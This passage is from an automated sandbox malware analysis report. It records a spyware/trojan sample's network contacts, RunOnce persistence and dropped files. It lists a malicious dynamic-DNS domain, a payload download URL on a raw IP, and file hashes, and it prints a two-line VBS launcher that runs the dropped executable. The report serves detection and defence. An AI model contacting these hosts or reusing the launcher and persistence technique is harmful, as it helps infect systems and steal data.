          http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M0%Avira URL Cloudsafe
          https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt0%URL Reputationsafe
          http://crl.pki.goog/GTSGIAG3.crl00%URL Reputationsafe
          https://logincdn.msauth.net/16.000.28230.00/MeControl.js0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          nhtaxfilling.ddnsgeek.com
          207.32.218.236
          truetrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            nhtaxfilling.ddnsgeek.comtrue
            • Avira URL Cloud: safe
            unknown
            http://147.189.137.168/1040_RyQoPlW98.bintrue
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhvFAB7.tmp.21.drfalse
              high
              https://www.google.com/chrome/static/images/folder-applications.svgbhvFAB7.tmp.21.drfalse
                high
                http://www.imvu.comrg4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.google.com/chrome/static/css/main.v2.min.cssbhvFAB7.tmp.21.drfalse
                  high
                  https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhvFAB7.tmp.21.drfalse
                    high
                    http://www.msn.combhvFAB7.tmp.21.drfalse
                      high
                      https://deff.nelreports.net/api/report?cat=msnbhvFAB7.tmp.21.drfalse
                      • URL Reputation: safe
                      unknown
                      http://google.com/chromebhvFAB7.tmp.21.drfalse
                        high
                        https://contextual.media.net/__media__/js/util/nrrV9140.jsbhvFAB7.tmp.21.drfalse
                          high
                          https://www.google.com/chrome/static/images/chrome-logo.svgbhvFAB7.tmp.21.drfalse
                            high
                            https://www.google.com/chrome/static/images/homepage/homepage_features.pngbhvFAB7.tmp.21.drfalse
                              high
                              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsbhvFAB7.tmp.21.drfalse
                              • URL Reputation: safe
                              unknown
                              https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhvFAB7.tmp.21.drfalse
                                high
                                https://www.google.com/chrome/bhvFAB7.tmp.21.drfalse
                                  high
                                  https://www.google.comg4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpfalse
                                    high
                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2ZbhvFAB7.tmp.21.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fbhvFAB7.tmp.21.drfalse
                                      high
                                      https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.pngbhvFAB7.tmp.21.drfalse
                                        high
                                        https://www.google.com/chrome/static/images/chrome_safari-behavior.jpgbhvFAB7.tmp.21.drfalse
                                          high
                                          http://www.msn.com/?ocid=iehpbhvFAB7.tmp.21.drfalse
                                            high
                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3bhvFAB7.tmp.21.drfalse
                                              high
                                              http://crl.pki.goog/GTS1O1core.crl0bhvFAB7.tmp.21.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                high
                                                https://www.google.com/chrome/static/images/icon-announcement.svgbhvFAB7.tmp.21.drfalse
                                                  high
                                                  http://www.nirsoft.net/g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmpfalse
                                                    high
                                                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%bhvFAB7.tmp.21.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.google.com/chrome/static/images/homepage/hero-anim-middle.pngbhvFAB7.tmp.21.drfalse
                                                      high
                                                      http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4NbhvFAB7.tmp.21.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/chrome/static/css/main.v3.min.cssbhvFAB7.tmp.21.drfalse
                                                        high
                                                        https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=bhvFAB7.tmp.21.drfalse
                                                          high
                                                          https://www.google.com/chrome/application/x-msdownloadC:bhvFAB7.tmp.21.drfalse
                                                            high
                                                            https://www.google.com/chrome/static/images/fallback/icon-file-download.jpgbhvFAB7.tmp.21.drfalse
                                                              high
                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhvFAB7.tmp.21.drfalse
                                                                high
                                                                http://www.imvu.comg4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpfalse
                                                                  high
                                                                  https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhvFAB7.tmp.21.drfalse
                                                                    high
                                                                    http://pki.goog/gsr2/GTS1O1.crt0bhvFAB7.tmp.21.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1bhvFAB7.tmp.21.drfalse
                                                                      high
                                                                      https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlbhvFAB7.tmp.21.drfalse
                                                                        high
                                                                        https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindexg4FtSOZMD9.exe, 00000015.00000003.616430526.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616818269.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616919140.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616667092.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616571537.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616756654.0000000002283000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://www.google.com/chrome/static/images/app-store-download.pngbhvFAB7.tmp.21.drfalse
                                                                            high
                                                                            https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhvFAB7.tmp.21.drfalse
                                                                              high
                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gbhvFAB7.tmp.21.drfalse
                                                                                high
                                                                                https://contextual.media.net/bhvFAB7.tmp.21.drfalse
                                                                                  high
                                                                                  https://pki.goog/repository/0bhvFAB7.tmp.21.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1bhvFAB7.tmp.21.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msnbhvFAB7.tmp.21.drfalse
                                                                                    high
                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736bhvFAB7.tmp.21.drfalse
                                                                                      high
                                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                                                        high
                                                                                        http://www.msn.com/bhvFAB7.tmp.21.drfalse
                                                                                          high
                                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhvFAB7.tmp.21.drfalse
                                                                                            high
                                                                                            https://www.google.com/chromebhvFAB7.tmp.21.drfalse
                                                                                              high
                                                                                              https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhvFAB7.tmp.21.drfalse
                                                                                                high
                                                                                                https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhvFAB7.tmp.21.drfalse
                                                                                                  high
                                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhvFAB7.tmp.21.drfalse
                                                                                                    high
                                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhvFAB7.tmp.21.drfalse
                                                                                                      high
                                                                                                      https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://contextual.media.net/48/nrrV18753.jsbhvFAB7.tmp.21.drfalse
                                                                                                        high
                                                                                                        https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhvFAB7.tmp.21.drfalse
                                                                                                          high
                                                                                                          https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                                                                            high
                                                                                                            https://www.google.com/accounts/serviceloging4FtSOZMD9.exefalse
                                                                                                              high
                                                                                                              https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhvFAB7.tmp.21.drfalse
                                                                                                                high
                                                                                                                https://www.google.com/chrome/static/images/homepage/google-dev.pngbhvFAB7.tmp.21.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhvFAB7.tmp.21.drfalse
                                                                                                                    high
                                                                                                                    http://crl.pki.goog/gsr2/gsr2.crl0?bhvFAB7.tmp.21.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://pki.goog/gsr2/GTSGIAG3.crt0)bhvFAB7.tmp.21.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://www.google.com/bhvFAB7.tmp.21.drfalse
                                                                                                                      high
                                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhvFAB7.tmp.21.drfalse
                                                                                                                        high
                                                                                                                        http://ns.adobe.c/g?g4FtSOZMD9.exe, 00000009.00000003.577311939.0000000020E52000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.624858543.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.596412607.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.577281474.0000000020E41000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.google.com/chrome/static/images/mac-ico.pngbhvFAB7.tmp.21.drfalse
                                                                                                                          high
                                                                                                                          http://pki.goog/gsr2/GTS1O1.crt0#bhvFAB7.tmp.21.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://www.google.com/chrome/static/images/google-play-download.pngbhvFAB7.tmp.21.drfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/chrome/static/images/chrome_throbber_fast.gifbhvFAB7.tmp.21.drfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/chrome/static/images/homepage/google-canary.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                high
                                                                                                                                https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                  high
                                                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationbhvFAB7.tmp.21.drfalse
                                                                                                                                    high
                                                                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                      high
                                                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/chrome/static/images/homepage/laptop_desktop.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/chrome/static/js/main.v2.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpgbhvFAB7.tmp.21.drfalse
                                                                                                                                              high
                                                                                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhvFAB7.tmp.21.drfalse
                                                                                                                                                high
                                                                                                                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comg4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLbhvFAB7.tmp.21.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629bhvFAB7.tmp.21.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/chrome/static/images/homepage/homepage_privacy.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvFAB7.tmp.21.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://147.189.137.168/1040_RyQoPlW98.bin~:g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-youtube.jpgbhvFAB7.tmp.21.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEEbhvFAB7.tmp.21.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://login.yahoo.com/config/loging4FtSOZMD9.exefalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0bhvFAB7.tmp.21.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2MbhvFAB7.tmp.21.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtbhvFAB7.tmp.21.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/chrome/static/images/cursor-replay.curbhvFAB7.tmp.21.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/chrome/static/js/installer.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://crl.pki.goog/GTSGIAG3.crl0bhvFAB7.tmp.21.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://logincdn.msauth.net/16.000.28230.00/MeControl.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown

                                                                                                                                                                    Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    147.189.137.168
                                                                                                                                                                    unknownUnited Kingdom
                                                                                                                                                                    786JANETJiscServicesLimitedGBtrue
                                                                                                                                                                    207.32.218.236
                                                                                                                                                                    nhtaxfilling.ddnsgeek.comUnited States
                                                                                                                                                                    143151GSERVERSUStrue

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                    Analysis ID:547022
                                                                                                                                                                    Start date:02.01.2022
                                                                                                                                                                    Start time:02:25:14
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 11m 32s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:light
                                                                                                                                                                    Sample file name:g4FtSOZMD9 (renamed file extension from none to exe)
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                    Number of analysed new started processes analysed:24
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.phis.troj.spyw.evad.winEXE@11/24@1/2
                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 19% (good quality ratio 16.8%)
                                                                                                                                                                    • Quality average: 68.6%
                                                                                                                                                                    • Quality standard deviation: 34.1%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 73%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    Warnings:
                                                                                                                                                                    Show All
                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.127.240.158, 51.104.136.2, 204.79.197.200, 13.107.21.200
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    02:27:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
                                                                                                                                                                    02:27:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
                                                                                                                                                                    02:28:04API Interceptor17x Sleep call for process: g4FtSOZMD9.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    No context

                                                                                                                                                                    Domains

                                                                                                                                                                    No context

                                                                                                                                                                    ASN

                                                                                                                                                                    No context

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    No context

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):258048
                                                                                                                                                                    Entropy (8bit):5.878526280109068
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:ShYPey2QV00E3KxPpW9J+PZK7kzqHD2+KM5KOKVhYPey2QV00E:ShYGy2a00yiw0ZK7RjbnQhYGy2a00
                                                                                                                                                                    MD5:81F377EDA4163DA1B74CAE83E38CED9F
                                                                                                                                                                    SHA1:E50ABAF01A9FD3AE8176B5B6117F6B8F8A355EC0
                                                                                                                                                                    SHA-256:A16D035CA37DBD7AB34C856F4CDF96A9898DCEBBA08C5801C99F3D3100AE6B3F
                                                                                                                                                                    SHA-512:8FD4613830195A00650386E450E72081546603DE6FDFF40CA039464CB5D33FD0D2AED0151C6F40558671D631C132F99A5400D9A2DB304AAC05729B941C40A63D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L....6.Y..........................................@.................................<...........................................(...........................................................................(... ....................................text...D........................... ..`.data...P...........................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):126
                                                                                                                                                                    Entropy (8bit):4.890716777636802
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:jfF+m8nhvF3mRDN+E2J5xAIcP0WHBW73zx1dAHMn:jFqhv9IN723fOJYxXiMn
                                                                                                                                                                    MD5:78974D0D4A018D52ECAC4581F08C3097
                                                                                                                                                                    SHA1:B58E51F273A55F0E72AD3066E62E385A7510C116
                                                                                                                                                                    SHA-256:91FA3C53A959A83B7FBC297A73221AFE509270F1BA0568B05B857C094696DF41
                                                                                                                                                                    SHA-512:AA2256B9844FF038670652CC17DCBB71B6EA89DFA356CDAE44C29E5EC203C3B7907815EDF909D13CE4A7C084ECC4B7BAA6D37E125B3EA950F673EC75B5781FA4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe")
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvFAB7.tmp
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x1277828c, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                    Entropy (8bit):0.9105350923938392
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:yHzZ+wP17f2s1ipPHihgmKdTnjVccgeTaNXvq:yHQswtT0q
                                                                                                                                                                    MD5:9D77F4E097E9A402A4E80E3633A107BA
                                                                                                                                                                    SHA1:CB2A59166D899060B160A4E57E902688CE8CB723
                                                                                                                                                                    SHA-256:E198962017B72E47DF7BB8C40BB28CBB9289051B6B0A0AA5EB9CBB778D3ACF4E
                                                                                                                                                                    SHA-512:0C2313F5A67A079A61B335F8483B329C3D2FAB576F728F1DBB5CC650F17C9918BE11CDAF7685D173088C0A5C50DEB16165846C8C66478F0142254BC8C6041BAD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: .w..... .......p........Ef..4...w........................%..........xA......zw.h.'............................W.4...w..............................................................................................[............B.................................................................................................................. ............zU.........................................................................................................................................................................................................................................7....z.q....................)....z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview: ..
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFF48BD71CF1E747D1.TMP
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):5.966668453944976
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:hlDqxNQ65JJT1coaPeybSF3SjNrb40nEPnngv8K7e:h2v53YPey2xSVb40nE/ngv8K7e
                                                                                                                                                                    MD5:30022F5F6D4029602D8AE6CEC49C635A
                                                                                                                                                                    SHA1:3370081AEE760B36D2EB4FD2DA7FB0383DFB0BF7
                                                                                                                                                                    SHA-256:31F023214DFD6343171820FB95CE4CDBFFF731262EA30C7E19B627981E4B0685
                                                                                                                                                                    SHA-512:D93BC21F9336819FFD1D4D913C50C7A6041824F7DB33C3E4875620357A953864306C10817094DB22768BF872806B1A1CFD81ABAE2DD482789A729FBD2B7D3EC6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Clock\logs.dat
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                    Entropy (8bit):6.922859102725601
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:z3qdECGmn6eplif1Fycug6718QzafFgfoUzf8E+T1tZno+HQpBLwdGiYdm:EZ6e7itW10fSfow8E+THc+
                                                                                                                                                                    MD5:BD21E7F3ACACFEF0FC32FF4CC5894C68
                                                                                                                                                                    SHA1:2D273E62F2C9E494D88898724E75C50031657CD4
                                                                                                                                                                    SHA-256:FAA6C759F4B7F528E50D1FDEDDF275BC3FE1B7DC83E3435EC8559A55760C25C4
                                                                                                                                                                    SHA-512:064D8EFAEC2AF4D29ACF936D758B7C8124C7D140B16AA09F9692F2A208A6B5C128AFDA96A95B7B152C6F964874EBE66F54C3954DE230BCCCF0B89ADD62DBF022
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: r(..0z...5...M.?<8i.^..`...BE@.......b.2Ci.N.-.K_..l....3..$..j.....:....1..|...^.Xx.|..V{.q'....`..v......+#.R.!c..z........h>.... |.<nv...$..\.].].....;s .%8...<D..`?=.
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_022802.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
